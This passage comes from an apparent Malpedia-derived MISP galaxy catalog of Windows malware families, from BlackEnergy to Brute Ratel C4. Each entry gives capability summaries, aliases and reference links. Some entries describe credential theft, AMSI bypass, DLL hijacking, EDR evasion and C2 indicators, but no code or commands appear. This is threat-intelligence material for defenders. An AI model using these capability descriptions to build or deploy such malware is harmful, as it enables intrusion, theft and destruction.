In 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included: - operations with victim’s filesystem - spreading with a parasitic infector - spying features like keylogging, screenshoots or a robust password stealer - Team viewer and a simple pseudo “remote desktop” - listing Windows accounts and scanning network - destroying the system

Typical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.

On 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.

The tag is: misp-galaxy:malpedia="BlackEnergy"

BlackEnergy is also known as:

Table 3028. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://attack.mitre.org/groups/G0034

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://marcusedmondson.com/2019/01/18/black-energy-analysis/

https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/

https://securelist.com/black-ddos/36309/

https://www.secureworks.com/research/blackenergy2

https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection

https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html

https://threatconnect.com/blog/casting-a-light-on-blackenergy/

https://www.welivesecurity.com/2014/10/14/cve-2014-4114-details-august-blackenergy-powerpoint-campaigns/

http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf

https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too

https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/

https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf

https://www.secureworks.com/research/threat-profiles/iron-viking

https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html

https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf

https://web.archive.org/web/20140428201836/http://www.fireeye.com/blog/technical/malware-research/2010/03/black-energy-crypto.html

https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Cherepanov-Lipovsky.pdf

https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games

https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf

http://pds15.egloos.com/pds/201001/01/66/BlackEnergy_DDoS_Bot_Analysis.pdf

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf

https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/

BlackGuard

According to Zscaler, BlackGuard has the capability to steal all types of information related to Crypto wallets, VPN, Messengers, FTP credentials, saved browser credentials, and email clients.

The tag is: misp-galaxy:malpedia="BlackGuard"

BlackGuard is also known as:

Table 3029. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackguard

https://blogs.blackberry.com/en/2022/04/threat-thursday-blackguard-infostealer

https://medium.com/s2wblog/the-history-of-blackguard-stealer-86207e72ffb4

https://blog.cyble.com/2022/04/01/dissecting-blackguard-info-stealer/

https://ke-la.com/information-stealers-a-new-landscape/

https://www.bleepingcomputer.com/news/security/new-blackguard-password-stealing-malware-sold-on-hacker-forums/

https://thehackernews.com/2022/04/experts-shed-light-on-blackguard.html

https://medium.com/s2wblog/rising-stealer-in-q1-2022-blackguard-stealer-f516d9f85ee5

https://cyberint.com/blog/research/blackguard-stealer/

https://www.techtimes.com/articles/273752/20220331/new-password-stealing-malware-hacking-forum-hack-password-stealing-google-chrome-binance-outlook-telegram.htm

https://www.zdnet.com/article/meet-blackguard-a-new-infostealer-peddled-on-russian-hacker-forums/

https://www.youtube.com/watch?v=Fd8WjxzY2_g

https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/

https://www.f5.com/labs/articles/threat-intelligence/blackguard-infostealer-malware-dissecting-the-state-of-exfiltrated-data

https://www.zscaler.com/blogs/security-research/analysis-blackguard-new-info-stealer-malware-being-sold-russian-hacking

https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/

BlackMagic

Ransomware

The tag is: misp-galaxy:malpedia="BlackMagic"

BlackMagic is also known as:

Table 3032. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmagic

https://blog.cyble.com/2022/12/07/a-closer-look-at-blackmagic-ransomware/

BlackMatter (Windows)

According to PCrisk, BlackMatter is a piece of malicious software categorized as ransomware. It operates by encrypting data for the purpose of making ransom demands for the decryption tools. In other words, files affected by BlackMatter are rendered inaccessible, and victims are asked to pay - to recover access to their data.

During the encryption process, files are appended with an extension consisting of a random character string. For example, a file initially named "1.jpg" would appear as something similar to "1.jpg.k5RO9fVOl". After this process is complete, the ransomware changes the desktop wallpaper and created a ransom note - "[random_string].README.txt" (e.g., k5RO9fVOl.README.txt).

The tag is: misp-galaxy:malpedia="BlackMatter (Windows)"

BlackMatter (Windows) is also known as:

Table 3033. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmatter

https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/

https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html

https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/

https://blog.group-ib.com/blackmatter#

https://www.netskope.com/blog/netskope-threat-coverage-blackmatter

https://us-cert.cisa.gov/ncas/alerts/aa21-291a

https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809

https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

https://www.tesorion.nl/en/posts/analysis-of-the-blackmatter-ransomware/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://www.youtube.com/watch?v=NIiEcOryLpI

https://twitter.com/GelosSnake/status/1451465959894667275

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/

https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751

https://services.google.com/fh/files/misc/gcat_threathorizons_full_nov2021.pdf

https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration

https://assets.virustotal.com/reports/2021trends.pdf

https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/

https://blog.minerva-labs.com/blackmatter

https://chuongdong.com/reverse%20engineering/2021/09/05/BlackMatterRansomware/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/

https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant—​lockbit-3-.html

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://www.mandiant.com/resources/cryptography-blackmatter-ransomware

https://www.varonis.com/blog/blackmatter-ransomware/

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group

https://www.nozominetworks.com/blog/blackmatter-ransomware-technical-analysis-and-tools-from-nozomi-networks-labs/

https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/

https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf

https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service

https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps

https://therecord.media/blackmatter-ransomware-says-its-shutting-down-due-to-pressure-from-local-authorities/

https://www.mcafee.com/blogs/enterprise/blackmatter-ransomware-analysis-the-dark-side-returns/

https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/

https://www.glimps.fr/lockbit3-0/

https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/

https://www.mandiant.com/resources/chasing-avaddon-ransomware

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://www.ciphertechsolutions.com/rapidly-evolving-blackmatter-ransomware-tactics/

https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf

https://blog.digital-investigations.info/2021-08-05-understanding-blackmatters-api-hashing.html

https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/

https://blog.group-ib.com/blackmatter2

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

BlackNET RAT

Advanced and modern Windows botnet with PHP panel developed using VB.NET. It has a lot of functionalities including: stealing/grabbing files and passwords, keylogging, cryptojacking, loading files, executing commands, etc. It is open source and emerged at the end of 2019.

The tag is: misp-galaxy:malpedia="BlackNET RAT"

BlackNET RAT is also known as:

Table 3034. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknet_rat

https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware

http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html

https://github.com/mave12/BlackNET-3.7.0.1

https://github.com/BlackHacker511/BlackNET/

https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/

https://github.com/FarisCode511/BlackNET/

https://labs.k7computing.com/?p=21365

BlackNix RAT

The tag is: misp-galaxy:malpedia="BlackNix RAT"

BlackNix RAT is also known as:

Table 3035. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknix_rat

https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb

BlackPOS

BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials.

The tag is: misp-galaxy:malpedia="BlackPOS"

BlackPOS is also known as:

  • Kaptoxa

  • MMon

  • POSWDS

  • Reedum

Table 3036. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos

https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/

https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf

https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/

https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf

BlackRevolution

The tag is: misp-galaxy:malpedia="BlackRevolution"

BlackRevolution is also known as:

Table 3038. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution

BlackSnake

The tag is: misp-galaxy:malpedia="BlackSnake"

BlackSnake is also known as:

Table 3042. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blacksnake

https://blog.cyble.com/2023/03/09/blacksnake-ransomware-emerges-from-chaos-ransomwares-shadow/

BlackSuit (Windows)

According to Trend Micro, this ransomware has significant code overlap with Royal Ransomware.

The tag is: misp-galaxy:malpedia="BlackSuit (Windows)"

BlackSuit (Windows) is also known as:

Table 3044. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blacksuit

https://www.trendmicro.com/en_us/research/23/e/investigating-blacksuit-ransomwares-similarities-to-royal.html

https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/

BleachGap

The tag is: misp-galaxy:malpedia="BleachGap"

BleachGap is also known as:

Table 3046. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bleachgap

https://labs.k7computing.com/index.php/bleachgap-revamped/

BLINDINGCAN

BLINDINGCAN is a remote access trojan that communicates with its C&C server via HTTP(S). It uses a (custom) RC4 or AES for encryption and decryption of its configuration and network traffic. It sends information about the victim’s environment, like computer name, IP, Windows product name and processor name. It supports around 30 commands that include operations on the victim’s filesystem, basic process management, command line execution, file exfiltration, configuration update, and the download and execution of additional payloads from the attackers' C&C. The commands are indexed by 16-bit integers, starting with the index 0x2009 and going incrementally up to 0x2057, with some indicis being skipped. It uses various parameter names in its HTTP POST requests, mostly associated with web servers running bulletin board systems, like bbs, article, boardid, s_board, page, idx_num, etc. It contains specific RTTI symbols like ".?AVCHTTP_Protocol@@", ".?AVCFileRW@@" or ".?AVCSinSocket@@". BLINDINGCAN RAT is a flagship payload deployed in many Lazarus attacks, especially in the Operation DreamJob campaigns happening in 2020-2022.

The tag is: misp-galaxy:malpedia="BLINDINGCAN"

BLINDINGCAN is also known as:

  • AIRDRY

  • ZetaNile

Table 3047. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan

https://www.hvs-consulting.de/lazarus-report/

https://www.sentinelone.com/blog/the-blindingcan-rat-and-malicious-north-korean-activity/

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a

https://www.cisa.gov/news-events/analysis-reports/ar20-232a

https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/

https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf

https://blogs.jpcert.or.jp/en/2020/09/BLINDINGCAN.html

https://securelist.com/the-lazarus-group-deathnote-campaign/109490/

https://securelist.com/it-threat-evolution-q2-2023/110355/

https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/

Blister

Elastic observed this loader coming with valid code signatures, being used to deploy secondary payloads in-memory.

The tag is: misp-galaxy:malpedia="Blister"

Blister is also known as:

  • COLORFAKE

Table 3049. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blister

https://security-labs.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://redcanary.com/blog/intelligence-insights-january-2022/

https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee

https://blog.fox-it.com/2023/11/01/popping-blisters-for-research-an-overview-of-past-payloads-and-exploring-recent-developments/

https://elastic.github.io/security-research/malware/2022/05/02.blister/article/

https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html

https://cloudsek.com/technical-analysis-of-code-signed-blister-malware-campaign-part-1/

https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt

https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html

https://www.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader

https://cloudsek.com/technical-analysis-of-code-signed-blister-malware-campaign-part-2/

https://twitter.com/MsftSecIntel/status/1522690116979855360

win.trojan.bloodalchemy

The tag is: misp-galaxy:malpedia="win.trojan.bloodalchemy"

win.trojan.bloodalchemy is also known as:

Table 3050. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bloodalchemy

https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor

BlueFox

BlueFox is a .NET infostealer sold on forums as a Maware-as-a-Service. Its capabilities are those of a classic information stealer, with a focus on cryptocurrency wallets, and file grabber and loader capabilities.

The tag is: misp-galaxy:malpedia="BlueFox"

BlueFox is also known as:

Table 3052. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bluefox

https://blog.sekoia.io/bluefox-information-stealer-traffer-maas/

https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar/

BLUEHAZE

Mandiant associates this with UNC4191, this malware is a launcher for NCAT to establish a reverse tunnel.

The tag is: misp-galaxy:malpedia="BLUEHAZE"

BLUEHAZE is also known as:

Table 3053. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bluehaze

https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia

BLUELIGHT

Malware family used to deliver follow up payloads, variants using Microsoft Graph API and Google Web Apps have been observed.

The tag is: misp-galaxy:malpedia="BLUELIGHT"

BLUELIGHT is also known as:

Table 3054. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bluelight

https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/

BlueNoroff

This family contains the BlueNoroff toolkit used for SWIFT manipulation, as used by the Lazarus activity cluster also referred to as BlueNoroff.

The tag is: misp-galaxy:malpedia="BlueNoroff"

BlueNoroff is also known as:

Table 3055. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bluenoroff

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf

BlueShell

According to AhnLab, BlueShell is a backdoor malware developed in Go language, published on Github, and it supports Windows, Linux, and Mac operating systems. Currently, the original Github repository is presumed to have been deleted, but the BlueShell source code can still be obtained from other repositories. It features an explanatory ReadMe file in Chinese, indicating the possibility that the creator is a Chinese user.

The tag is: misp-galaxy:malpedia="BlueShell"

BlueShell is also known as:

Table 3056. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blueshell

https://asec.ahnlab.com/ko/56715/

https://asec.ahnlab.com/en/47455/

https://asec.ahnlab.com/en/56941/

BOATLAUNCH

FIN7 uses this malware as helper module during intrusion operations. BOATLAUNCH is continuously looking for PowerShell processes on infected systems and patches them to bypuss Windows AntiMalware Scan Interface (AMSI).

The tag is: misp-galaxy:malpedia="BOATLAUNCH"

BOATLAUNCH is also known as:

Table 3060. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.boatlaunch

https://www.mandiant.com/resources/evolution-of-fin7

Bobik

This malware offers remote access capabilities but also has a DDoS module that was used against supporters of Ukraine.

The tag is: misp-galaxy:malpedia="Bobik"

Bobik is also known as:

Table 3062. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bobik

https://decoded.avast.io/martinchlumecky/bobik/

https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/

Bohmini

The tag is: misp-galaxy:malpedia="Bohmini"

Bohmini is also known as:

Table 3063. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini

BOLDMOVE (Windows)

According to Mandiant, this malware family is attributed to potential chinese background and its Linux variant is related to exploitation of Fortinet’s SSL-VPN (CVE-2022-42475).

The tag is: misp-galaxy:malpedia="BOLDMOVE (Windows)"

BOLDMOVE (Windows) is also known as:

Table 3064. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.boldmove

https://thehackernews.com/2023/01/new-chinese-malware-spotted-exploiting.html

https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw

BookCodes RAT

BookCodesRAT is a remote access trojan that uses HTTP(S) for communication. It supports around 25 commands that include operations on the victim’s filesystem, basic process management and the download and execution of additional tools from the attacker’s arsenal. They are indexed by 32-bit integers, starting with the value 0x97853646.

BookCodesRAT uses mostly compromised South Korean web servers for the C&C traffic and is usually deployed against South Korean targets.

The tag is: misp-galaxy:malpedia="BookCodes RAT"

BookCodes RAT is also known as:

  • BookCodesTea

Table 3066. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bookcodesrat

https://www.welivesecurity.com/2020/11/16/lazarus-supply-chain-attack-south-korea/

https://www.boho.or.kr/filedownload.do?attach_file_seq=2612&attach_file_id=EpF2612.pdf

https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/

https://www.boho.or.kr/filedownload.do?attach_file_seq=2452&attach_file_id=EpF2452.pdf

https://vblocalhost.com/uploads/VB2021-Lee-etal.pdf

https://vblocalhost.com/uploads/VB2021-Park.pdf

Book of Eli

This in .Net written malware is a classic information stealer. It can collect various information and can be depoyed in different configurations: "The full-featured version of the malware can log keystrokes, collect profile files of Mozilla Firefox and Google Chrome browsers, record sound from the microphone, grab desktop screenshots, capture photo from the webcam, and collect information about the version of the operation system and installed anti-virus software." (ESET) This malware has been active since at least 2012.

The tag is: misp-galaxy:malpedia="Book of Eli"

Book of Eli is also known as:

Table 3067. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bookofeli

https://www.welivesecurity.com/2016/09/22/libya-malware-analysis/

Bookworm

The tag is: misp-galaxy:malpedia="Bookworm"

Bookworm is also known as:

Table 3068. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bookworm

https://unit42.paloaltonetworks.com/bookworm-trojan-a-model-of-modular-architecture/

BOOSTWRITE

FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.

The tag is: misp-galaxy:malpedia="BOOSTWRITE"

BOOSTWRITE is also known as:

Table 3070. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.boostwrite

https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

BOOTWRECK

BOOTWRECK is a master boot record wiper malware.

The tag is: misp-galaxy:malpedia="BOOTWRECK"

BOOTWRECK is also known as:

  • MBRkiller

Table 3071. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck

https://content.fireeye.com/apt/rpt-apt38

https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-latin-american-financial-organizations-again/

Borat RAT

The Borat RAT comes bundled with its components (e.g. binary builder, supporting modules, server certificates). According to Cyble this malware is an unique combination of RAT, Spyware, and ransomware. The supporting modules are included; a few of the capabilities: Keylogger, Ransomware, Audio/Webcam Recording, Process Hollowing, Browser Credential/Discord Token Stealing, etc.

The tag is: misp-galaxy:malpedia="Borat RAT"

Borat RAT is also known as:

Table 3072. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.boratrat

https://blogs.blackberry.com/en/2022/04/threat-thursday-boratrat

https://blog.cyble.com/2022/03/31/deep-dive-analysis-borat-rat/

https://www.bleepingcomputer.com/news/security/new-borat-remote-access-malware-is-no-laughing-matter/

BottomLoader

The tag is: misp-galaxy:malpedia="BottomLoader"

BottomLoader is also known as:

Table 3074. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bottomloader

https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/

BoxCaon

According to Checkpoint Research, this malware family has the ability to download and upload files, run commands and send the attackers the results. It has been observed being used by threat actor IndigoZebra.

The tag is: misp-galaxy:malpedia="BoxCaon"

BoxCaon is also known as:

Table 3076. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.boxcaon

https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/

BRAIN

The tag is: misp-galaxy:malpedia="BRAIN"

BRAIN is also known as:

Table 3078. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.brain

https://www.welivesecurity.com/2017/01/18/flashback-wednesday-pakistani-brain/

BrbBot

The tag is: misp-galaxy:malpedia="BrbBot"

BrbBot is also known as:

Table 3081. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.brbbot

https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Brbbot/Brbbot.md

BreachRAT

This is a backdoor which FireEye call the Breach Remote Administration Tool (BreachRAT), written in C++. The malware name is derived from the hardcoded PDB path found in the RAT: C:\Work\Breach Remote Administration Tool\Release\Client.pdb

The tag is: misp-galaxy:malpedia="BreachRAT"

BreachRAT is also known as:

Table 3082. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.breach_rat

https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html

Breakthrough

There is no reference available for this family and all known samples have version 1.0.0.

Pdb-strings in the samples suggest that this is an "exclusive" loader, known as "breakthrough" (maybe), e.g. C:\Users\Exclusiv\Desktop\хп-пробив\Release\build.pdb

The communication url parameters are pretty unique in this combination: gate.php?hwid=<guid>&os=<OS>&build=1.0.0&cpu=8

<OS> is one of: Windows95 Windows98 WindowsMe Windows95family WindowsNT3 WindowsNT4 Windows2000 WindowsXP WindowsServer2003 WindowsNTfamily WindowsVista Windows7 Windows8 Windows10

The tag is: misp-galaxy:malpedia="Breakthrough"

Breakthrough is also known as:

Table 3083. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader

BROKEYOLK

According to Mandiant, BROKEYOLK is a .NET downloader that downloads and executes a file from a hard-coded command and control (C2) server. The malware communicates via SOAP (Simple Object Access Protocol) requests using HTTP.

The tag is: misp-galaxy:malpedia="BROKEYOLK"

BROKEYOLK is also known as:

Table 3086. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.brokeyolk

https://www.mandiant.com/media/17826

https://socradar.io/dark-web-profile-apt42-iranian-cyber-espionage-group/

Bruh Wiper

The tag is: misp-galaxy:malpedia="Bruh Wiper"

Bruh Wiper is also known as:

Table 3088. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bruh_wiper

https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper

Brute Ratel C4

Brute Ratel is a a Customized Command and Control Center for Red Team and Adversary Simulation

SMB and TCP payloads provide functionality to write custom external C2 channels over legitimate websites such as Slack, Discord, Microsoft Teams and more. Built-in debugger to detect EDR userland hooks. Ability to keep memory artifacts hidden from EDRs and AV. Direct Windows SYS calls on the fly.

The tag is: misp-galaxy:malpedia="Brute Ratel C4"

Brute Ratel C4 is also known as:

  • BruteRatel

Table 3090. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads-part-2/

https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads/

https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html

https://www.splunk.com/en_us/blog/security/deliver-a-strike-by-reversing-a-badger-brute-ratel-detection-and-analysis.html

https://socradar.io/brute-ratel-utilized-by-threat-actors-in-new-ransomware-operations/

https://protectedmo.de/brute.html

https://bruteratel.com/research/feature-update/2021/06/01/PE-Reflection-Long-Live-The-King/

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://blog.spookysec.net/analyzing-brc4-badgers/

https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf

https://0xdarkvortex.dev/hiding-in-plainsight/

https://andreafortuna.org/2023/02/23/how-to-detect-brute-ratel-activities

https://twitter.com/MichalKoczwara/status/1652067563545800705

https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f

https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/

https://www.youtube.com/watch?v=a7W6rhkpVSM

https://twitter.com/embee_research/status/1580030303950995456?s=20&t=0vfXnrCXaVSX-P-hiSrFwA

https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/

https://web.archive.org/web/20230216110153/https://yoroi.company/research/hunting-cyber-evil-ratels-from-the-targeted-attacks-to-the-widespread-usage-of-brute-ratel/

